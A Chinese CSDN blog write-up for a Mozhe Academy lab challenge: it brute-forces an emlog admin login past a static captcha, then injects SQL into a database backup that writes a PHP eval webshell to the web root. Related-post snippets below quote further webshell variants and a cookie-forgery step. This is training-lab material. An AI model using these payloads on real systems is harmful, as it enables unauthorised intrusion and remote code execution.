墨者学院-CMS系统漏洞分析溯源(第6题)

最新推荐文章于 2024-03-08 18:11:32 发布

D丶D

最新推荐文章于 2024-03-08 18:11:32 发布

阅读量583

点赞数

本文链接：https://blog.csdn.net/a519395243/article/details/85257440

版权

按提示先找后台，用御剑找后台

后台地址 ip/servlets/

在首页找到 mozhe777 用户，利用emlog博客的漏洞，错误不刷新验证码爆破密码

用burp 爆破

爆破出密码为 qwer1234

登录成功后，点击数据库栏目

再点击备份数据库

编辑备份下来的数据库，在末尾添加sql（新建emlog_shell数据表，向该表中添加小马，写入文件，再删除）

drop table if exists emlog_shell;
create table emlog_shell(`cmd` longtext not null);
insert into emlog_shell values("<?php @eval($_POST['c']);?>");
select cmd from emlog_shell into outfile '/var/www/html/11112.php';
drop table if exists emlog_shell;

编辑修改成功，点击导入，访问新建的 shell.php 文件

http://219.153.49.228:47980/shell.php

访问没报错，证明写入木马文件成功

用菜刀连接

连接成功，key在根目录下

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

D丶D

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

CMS系统漏洞分析溯源(第6题)

weixin_50698958的博客

10-07

343

靶场： https://www.mozhe.cn/bug/detail/Yy9vUVVqcWNmWEpKdFh4dTFheHVZdz09bW96aGUmozhe 背景介绍安全工程师"墨者"的朋友搭建一个emlog个人博客系统，为了确保该系统的安全性，请你检测该系统是否存在安全漏洞。实训目标 1、了解验证码绕过的相关知识； 2、了解后台地址扫描及其他相关漏洞资料； 3、了解后台常用账户密码的利用方式；解题方向进入后台，找到后台中可利用的地方getshell；解题思路： 1、使用

墨者学院 - CMS系统漏洞分析溯源(第5题)

多崎巡礼的博客

10-29

1615

phpecms1.3 cookies欺骗漏洞进后台 phpecms1.3/admin/cms_check.php <?php if(!isset($_COOKIE['admin_name'])){ alert_href('非法登录','cms_login.php'); }; ?> 判断如果没有admin_na...

参与评论您还未登录，请先登录后发表或查看评论

墨者 - CMS系统漏洞分析溯源(第6题)

吃肉唐僧的博客

07-22

483

打开环境，根据题目提示上网搜索emlog博客的后台地址，一般为/admin 但是访问失败，应该是改过路径了用御剑扫描后台（坑点），只扫出以下地址分别访问这些地址都没有后台的，后来看别人的解题思路才发现别人一扫就出来了（换了很多个版本，珍藏版，目录优化版，加强字典版.....均扫不出，一把泪）这里参考https://blog.csdn.net/weixin_43884770...

【墨者学院】CMS系统漏洞分析溯源(第6题)

weixin_43884770的博客

12-19

737

墨者学院-CMS系统漏洞分析溯源(第4题)

JimWu的博客

09-04

827

CMS系统漏洞分析溯源(第4题) 难易程度:★★★ 题目类型:身份认证和会话管理使用工具:FireFox浏览器、wwwscan、菜刀 1.打开靶场，用wwwscan扫一下。发现后台/admin/home.asp 2.访问后台http://219.153.49.228:49339/admin/home.asp，显示还没有登陆。 3.使用cookie-editor，伪造cookie，添加use...

墨者学院-CMS系统漏洞分析溯源(第7题)

JimWu的博客

09-04

979

CMS系统漏洞分析溯源(第7题) 难易程度:★★ 题目类型:CMS漏洞使用工具:FireFox浏览器、burpsuite、御剑 1.打开靶场，先在网上查一下dedecms的漏洞。知道了有能在重置密码页面修改任意用户密码的漏洞 2.用御剑随便扫扫，然后打开burpsuite，访问/member/resetpassword.php，截包。我们send to repeater，修改get的参数 ?...

墨者学院 - CMS系统漏洞分析溯源(第4题)

多崎巡礼的博客

10-09

1054

使用火狐插件cookie-editor 新增一个cookie value如下 username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70...

墨者学院_CMS系统漏洞分析溯源(第9题)

weixin_50698958的博客

09-23

637

漏洞概述：在一、pandas是什么？示例：pandas 是基于NumPy 的一种工具，该工具是为了解决数据分析任务而创建的。二、使用步骤 1.引入库代码如下（示例）： import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns import warnings warnings.filterwarnings('ignore') import ssl ssl._

beescms总结

02-29

墨者学院 - WebShell代码分析溯源(第6题)

多崎巡礼的博客

08-03

449

审查代码，在图片文件夹中有php（有毒）使用了回调函数array_map（将用函数去执行每个参数，返回结果）、$_REQUEST、$_POST，通过分析，类似于第五题，用e来接受assert的base64加密的值作为函数，用POST作为密码使用菜刀连接地址为 ip/www/Assets/upload/pic3.jpg.php?e=YXNzZXJ0密码是POST，key文件在/var...

墨者 - WebShell代码分析溯源(第6题)

吃肉唐僧的博客

07-13

248

下载文件，又是一番探索木马文件发现如下代码 <?php error_reporting(0); $e = $_REQUEST['e']; $arr = array($_POST['POST'],); array_map(base64_decode($e), $arr); ?> 这个也是一句木马的变种，获取url的e参数值（需要经过base64编码），链接密码是POST ...

墨者学院-WebShell代码分析溯源(第6题)

JimWu的博客

09-04

241

WebShell代码分析溯源(第6题) 难易程度:★★ 题目类型:代码审计使用工具:FireFox浏览器、菜刀、记事本 1.访问网页，下载网页源代码。 2.查看每个文件夹的源代码，发现在/Assets/upload中有可疑文件，php文件想冒充jpg。 3.打开文件，发现果然是一句话木马。分析代码，了解到array_map属于回调函数。 base64_decode(e)为函数，e)为函数，...

360众测靶场题库之35-WebShell代码分析溯源(第6题)